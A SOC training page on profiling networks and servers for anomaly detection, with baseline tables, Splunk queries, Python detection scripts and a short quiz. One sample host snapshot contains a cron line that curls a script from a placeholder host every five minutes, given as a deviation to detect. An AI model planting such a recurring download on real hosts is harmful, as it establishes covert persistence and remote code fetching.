Network & Server Profiling

Establishing baselines for anomaly detection

Week 5 TOPIC 5.5 - IR & Forensics Fundamentals

What is Network/Server Profiling?

Network and server profiling involves establishing "normal" behavior patterns for systems and network traffic. This baseline enables detection of anomalies that may indicate compromise, misconfiguration, or performance issues. Without a baseline, every event looks the same.

Why Profiling Matters

Anomaly Detection

Know what's normal so you can spot what's abnormal. A server making outbound DNS queries might be normal - or might indicate C2.

Reduced False Positives

Baseline-aware rules generate fewer alerts because expected behavior is filtered out.

Faster Triage

When you know a system's profile, you can quickly determine if activity is suspicious or business-as-usual.

Incident Investigation

Historical baselines help identify when anomalous behavior started - crucial for timeline building.

What to Profile — Server Baseline Attributes

A complete server profile captures these attributes. Any deviation from baseline warrants investigation:

Attribute | Normal Baseline Example | Suspicious Deviation
--- | --- | ---
Listening ports | Web server: 80, 443, 22 | New port 4444 opened (potential reverse shell)
Running processes | nginx, sshd, syslog-ng | Unknown process kworker-update running as www-data
Outbound connections | Updates to apt.ubuntu.com, NTP to time.nist.gov | HTTP to unknown IP in Eastern Europe at 3 AM
CPU / Memory | Average 15% CPU, 4GB RAM used | Sustained 95% CPU (crypto mining or DDoS participation)
DNS queries | Resolves company domains, CDN endpoints | High volume DNS queries to newly registered domains (DGA detection)
User logins | Admin SSH from jump box during business hours | Root login via password from external IP at 2 AM
Scheduled tasks | Cron: logrotate daily, backup at midnight | New cron entry running curl to download a script every 5 minutes

Network Baseline — What Normal Traffic Looks Like

# Example: Normal vs Anomalous NetFlow for a database server

NORMAL:
  Internal only traffic (10.0.0.0/8)
  Port 3306 (MySQL) from app servers only
  ~2 GB/day data transfer
  Peak hours: 08:00-18:00

ANOMALOUS:
  External connection to 185.234.x.x:443
  Port 3306 queried from unknown workstation
  15 GB transferred in 2 hours (10x normal)
  Activity spike at 03:00 on Saturday
Foundation Content

This topic extends the Log Basics presentation from Eye House, adding practical profiling techniques for SOC operations.

Source: Eye House > Presentations > Log Basics Open Source Content

Key Profiling Elements

Network Profile Components

Element | What to Baseline | Anomaly Example
--- | --- | ---
Traffic Volume | Bytes/packets per hour by segment | 10x normal traffic at 3 AM
Protocol Distribution | % HTTP, DNS, SMB, etc. | Sudden spike in DNS traffic
Connection Patterns | Common src-dst pairs | Workstation connecting to file server directly
Port Usage | Expected ports by system type | Web server making outbound port 4444
Geographic Destinations | Normal countries for traffic | Traffic to unexpected foreign IPs
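The database-server NetFlow example and the network profile components above describe the checks in prose; the script below is an added example (not part of the course material) that runs them over constructed flow records. It learns a mean bytes-per-hour figure from a short learning window, then flags external peers, MySQL connections from anything other than the app servers, and hours that exceed 10x the learned volume or fall outside the 08:00-18:00 weekday window. The CSV flow format, the two app-server addresses and every flow line are constructed for the demo; 10.1.3.50 is the database address from the PROD-WEB-01 profile later on this page.

```python
"""Network baseline check over NetFlow-style records.

Added example, not part of the course material. The flow format
(timestamp,src_ip,dst_ip,dst_port,bytes), the two app-server addresses and
every flow below are constructed for the demo; 10.1.3.50 is the database
address used in the PROD-WEB-01 profile.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
import ipaddress
import statistics

INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # "internal only traffic" from the slide
DB_SERVER = "10.1.3.50"
MYSQL_PORT = 3306
APP_SERVERS = {"10.1.2.100", "10.1.2.101"}      # assumed: the only legitimate MySQL clients
PEAK_HOURS = range(8, 18)                        # 08:00-18:00 peak window from the slide
SPIKE_FACTOR = 10                                # "10x normal" volume threshold

# Constructed learning window: app servers talking to the database in business hours.
BASELINE_LINES = [
    "2024-03-04T09:10:00,10.1.2.100,10.1.3.50,3306,60000000",
    "2024-03-04T09:40:00,10.1.2.101,10.1.3.50,3306,40000000",
    "2024-03-04T10:15:00,10.1.2.100,10.1.3.50,3306,100000000",
    "2024-03-05T09:05:00,10.1.2.101,10.1.3.50,3306,100000000",
]

# Constructed observation window: a Saturday 03:00 burst plus two profile
# violations, followed by an ordinary Monday-morning flow that raises nothing.
CURRENT_LINES = [
    "2024-03-09T03:05:00,10.1.2.100,10.1.3.50,3306,600000000",
    "2024-03-09T03:20:00,10.1.2.100,10.1.3.50,3306,500000000",
    "2024-03-09T03:30:00,10.1.5.23,10.1.3.50,3306,2000000",    # unknown workstation -> MySQL
    "2024-03-09T03:31:00,10.1.3.50,203.0.113.7,443,4000000",   # database server -> internet
    "2024-03-11T09:00:00,10.1.2.100,10.1.3.50,3306,50000000",
]


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    dst: str
    dport: int
    nbytes: int


def parse_flow(line: str) -> Flow:
    ts, src, dst, dport, nbytes = line.strip().split(",")
    return Flow(datetime.fromisoformat(ts), src, dst, int(dport), int(nbytes))


def bytes_per_hour(flows):
    """Sum bytes into one-hour buckets, the unit the Traffic Volume row baselines."""
    buckets = defaultdict(int)
    for f in flows:
        buckets[f.ts.replace(minute=0, second=0, microsecond=0)] += f.nbytes
    return buckets


def build_baseline(flows):
    """Mean bytes per active hour over the learning window."""
    return statistics.mean(bytes_per_hour(flows).values())


def check_flows(flows, baseline_bph):
    """Return (rule, detail) findings for deviations from the network profile."""
    findings = []
    for f in flows:
        # Connection Patterns / Geographic Destinations: any peer outside 10.0.0.0/8.
        if any(ipaddress.ip_address(a) not in INTERNAL for a in (f.src, f.dst)):
            findings.append(("external_peer", f"{f.src} -> {f.dst}:{f.dport}"))
        # Port Usage: MySQL must only be reached from the app servers.
        if f.dst == DB_SERVER and f.dport == MYSQL_PORT and f.src not in APP_SERVERS:
            findings.append(("unexpected_db_client", f"{f.src} -> {DB_SERVER}:{MYSQL_PORT}"))
    # Traffic Volume: compare each observed hour against the learned mean.
    for hour, total in sorted(bytes_per_hour(flows).items()):
        off_hours = hour.weekday() >= 5 or hour.hour not in PEAK_HOURS
        if total > SPIKE_FACTOR * baseline_bph:
            when = "off-hours" if off_hours else "in peak window"
            findings.append(("volume_spike", f"{hour:%Y-%m-%d %H:00} {total} bytes ({when})"))
        elif off_hours and total > baseline_bph:
            findings.append(("off_hours_activity", f"{hour:%Y-%m-%d %H:00} {total} bytes"))
    return findings


if __name__ == "__main__":
    baseline = build_baseline([parse_flow(l) for l in BASELINE_LINES])
    print(f"baseline: {baseline:.0f} bytes/hour")
    for rule, detail in check_flows([parse_flow(l) for l in CURRENT_LINES], baseline):
        print(f"{rule:22s} {detail}")
```

The Monday flow at the end of the observation window shows why the baseline matters: the same source, destination and port produce no finding because the volume and timing match the profile, while the Saturday burst is reported once as a volume spike rather than separately for every flow in that hour.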

Server Profile Components

Running Services

List of expected services/processes. New unknown process = investigate.

User Accounts

Expected local/domain accounts. New admin account = red flag.

Listening Ports

Expected network ports. Unexpected listener = backdoor potential.

Scheduled Tasks

Known cron jobs/scheduled tasks. New persistence mechanism = investigate.

Example Server Profile

# Web Server Profile: PROD-WEB-01

Hostname: PROD-WEB-01
Role: Production Web Server
OS: Ubuntu 22.04 LTS
IP: 10.1.2.100

Expected Services:
  - nginx (port 80, 443)
  - node (port 3000 - internal only)
  - sshd (port 22 - admin subnet only)

Expected Connections:
  - Inbound: Any → 80, 443
  - Inbound: 10.1.1.0/24 → 22
  - Outbound: → 10.1.3.50 (database)
  - Outbound: → 10.1.4.10 (logging)

Admin Accounts: webadmin, svc-deploy

Anomaly: Any outbound to internet = INVESTIGATE
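A profile like the one above is only useful if something compares it against what the host is actually doing. The script below is an added example (not part of the course material) that encodes the PROD-WEB-01 profile as data and diffs a constructed host snapshot against it, covering the four server profile components listed above (services, accounts, listening ports, scheduled tasks) plus outbound destinations. The snapshot deliberately contains the deviations from the Server Baseline Attributes table: a new listener on 4444, an unknown process running as www-data, a curl-download cron entry and an outbound connection to the internet. The syslog-ng process comes from that table; the 203.0.113.45 address, the support account and the example.invalid URL are placeholders.

```python
"""Compare an observed host snapshot against its documented server profile.

Added example, not part of the course material. PROFILE mirrors the PROD-WEB-01
slide (syslog-ng is taken from the Server Baseline Attributes table); the
OBSERVED snapshot is constructed and deliberately contains the deviations that
table lists. The 203.0.113.45 address and example.invalid URL are placeholders.
"""
import ipaddress

INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # anything else counts as "internet"

PROFILE = {
    "hostname": "PROD-WEB-01",
    "listening": {80: "nginx", 443: "nginx", 3000: "node", 22: "sshd"},
    "processes": {"nginx", "node", "sshd", "syslog-ng"},
    "outbound_allowed": {"10.1.3.50", "10.1.4.10"},   # database, logging
    "admin_accounts": {"webadmin", "svc-deploy"},
    "cron": {"logrotate daily", "backup at midnight"},
}

# Constructed snapshot, as an osquery- or netstat-style collector might report it.
OBSERVED = {
    "listening": [  # (port, process, user)
        (80, "nginx", "www-data"),
        (443, "nginx", "www-data"),
        (3000, "node", "node"),
        (22, "sshd", "root"),
        (4444, "kworker-update", "www-data"),
    ],
    "processes": ["nginx", "node", "sshd", "syslog-ng", "kworker-update"],
    "outbound": ["10.1.3.50", "10.1.4.10", "203.0.113.45"],
    "admin_accounts": ["webadmin", "svc-deploy", "support"],
    "cron": [
        "logrotate daily",
        "backup at midnight",
        "*/5 * * * * curl -o /tmp/update.sh http://example.invalid/update.sh",
    ],
}


def diff_profile(profile, observed):
    """Return (rule, detail) findings for everything outside the profile."""
    findings = []
    # Listening Ports: unexpected listener, or a known port served by the wrong binary.
    for port, proc, user in observed["listening"]:
        expected = profile["listening"].get(port)
        if expected is None:
            findings.append(("new_listener", f"{port}/tcp {proc} as {user}"))
        elif expected != proc:
            findings.append(("listener_process_mismatch", f"{port}/tcp {proc}, expected {expected}"))
    # Running Services: any process not on the expected list.
    for proc in sorted(set(observed["processes"]) - profile["processes"]):
        findings.append(("unknown_process", proc))
    # Expected Connections: the profile marks any outbound to the internet INVESTIGATE.
    for dst in observed["outbound"]:
        if dst not in profile["outbound_allowed"]:
            priority = "INVESTIGATE" if ipaddress.ip_address(dst) not in INTERNAL else "review"
            findings.append(("unexpected_outbound", f"{dst} ({priority})"))
    # User Accounts: a new admin account is a red flag.
    for acct in sorted(set(observed["admin_accounts"]) - profile["admin_accounts"]):
        findings.append(("new_admin_account", acct))
    # Scheduled Tasks: a new cron entry is a possible persistence mechanism.
    for job in observed["cron"]:
        if job not in profile["cron"]:
            findings.append(("new_cron_entry", job))
    return findings


if __name__ == "__main__":
    for rule, detail in diff_profile(PROFILE, OBSERVED):
        print(f"{PROFILE['hostname']}: {rule:26s} {detail}")
```

Keeping the profile as structured data rather than a slide means the quarterly review in step 4 below is a pull request against this file, and the same diff routine can run after every change to confirm the host still matches its documented role.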

SOC Analyst Application

Using Profiles for Alert Triage

Alert | Without Profile | With Profile
--- | --- | ---
Outbound SSH from 10.1.2.100 | Unknown - need to research | Web server - should NEVER initiate SSH. High priority!
Large file transfer at 2 AM | Suspicious timing | Backup server - scheduled backup window. Expected.
New listening port 8080 | Unknown service | Dev server - expected for testing. Verify with owner.
Connection to foreign IP | Potentially suspicious | CDN server - expected for content delivery. Normal.

Building Profiles in Practice

1. Asset Inventory

Start with CMDB or asset management. Know what systems exist.

2. Traffic Analysis

Use NetFlow/IPFIX to establish traffic patterns over 30+ days.

3. Log Analysis

Review authentication logs, service logs to understand normal behavior.

4. Document & Update

Profiles change! Review quarterly or after major changes.

SOC Analyst Tip

Profile Your Critical Assets First: You can't profile everything. Start with crown jewels - domain controllers, database servers, key applications. These are high-value targets where anomaly detection matters most.

SIEM Baseline Queries

// Splunk: Establish outbound connection baseline by server
index=firewall action=allowed direction=outbound
| stats dc(dest_ip) as unique_destinations, sum(bytes) as total_bytes by src_ip
| where total_bytes > 1000000
| sort - total_bytes
// Run weekly, compare to previous weeks

// Find new listening ports
index=endpoint sourcetype=osquery
| search listening_ports
| stats earliest(_time) as first_seen by host, port, process
| where first_seen > relative_time(now(), "-7d")
// Ports opened in last 7 days - compare to baseline
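The first query ends with "run weekly, compare to previous weeks", and that comparison is where the baseline actually earns its value. The script below is an added example (not part of the course material) of that step: it assumes the query's result was exported each week as CSV with the columns src_ip, unique_destinations and total_bytes, and reports sources that appear for the first time, sources whose destination count fanned out, and sources whose byte volume grew past a threshold. Both weeks of data and the growth factors are constructed for the demo.

```python
"""Week-over-week comparison of the Splunk outbound baseline output.

Added example, not part of the course material. It assumes the outbound
baseline query was exported once per week as CSV with the columns
src_ip,unique_destinations,total_bytes; the two weeks below are constructed.
"""
import csv
import io

LAST_WEEK = """src_ip,unique_destinations,total_bytes
10.1.2.100,2,4100000
10.1.3.50,1,2200000
10.1.4.10,3,9000000
"""

THIS_WEEK = """src_ip,unique_destinations,total_bytes
10.1.2.100,9,4300000
10.1.3.50,1,26000000
10.1.4.10,3,9100000
10.1.5.23,4,1500000
"""


def load_week(text):
    """Map src_ip -> (unique_destinations, total_bytes) from one week's export."""
    rows = csv.DictReader(io.StringIO(text))
    return {r["src_ip"]: (int(r["unique_destinations"]), int(r["total_bytes"])) for r in rows}


def compare_weeks(previous, current, dest_growth=3, bytes_growth=5):
    """Return (src_ip, rule, detail) for sources that moved away from last week's baseline.

    dest_growth and bytes_growth are constructed thresholds: a source whose
    destination count or byte volume multiplied by at least that factor is reported.
    """
    findings = []
    for src, (dests, nbytes) in sorted(current.items()):
        if src not in previous:
            # A server that sent >1 MB outbound this week but nothing last week.
            findings.append((src, "new_source", f"{nbytes} bytes to {dests} destinations"))
            continue
        prev_dests, prev_bytes = previous[src]
        if dests >= dest_growth * prev_dests:
            # Same volume, many more peers: the pattern a web server should never show.
            findings.append((src, "destination_fanout", f"{prev_dests} -> {dests} destinations"))
        if nbytes >= bytes_growth * prev_bytes:
            # Same peers, far more data: possible staging or exfiltration.
            findings.append((src, "volume_growth", f"{prev_bytes} -> {nbytes} bytes"))
    return findings


if __name__ == "__main__":
    for src, rule, detail in compare_weeks(load_week(LAST_WEEK), load_week(THIS_WEEK)):
        print(f"{src:12s} {rule:20s} {detail}")
```

Note that 10.1.4.10 is absent from the output even though its numbers changed: a 1% increase is noise, and filtering it out is exactly the "reduced false positives" benefit described earlier on this page.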

Knowledge Check

Test your understanding of network/server profiling. Score 80% or higher to pass.

1. What is the primary purpose of network/server profiling?

2. A web server suddenly begins making outbound connections to port 4444. Why is this concerning?

3. Which element is NOT typically part of a server profile?

4. How often should system profiles be reviewed and updated?

5. Which systems should be profiled FIRST in a SOC environment?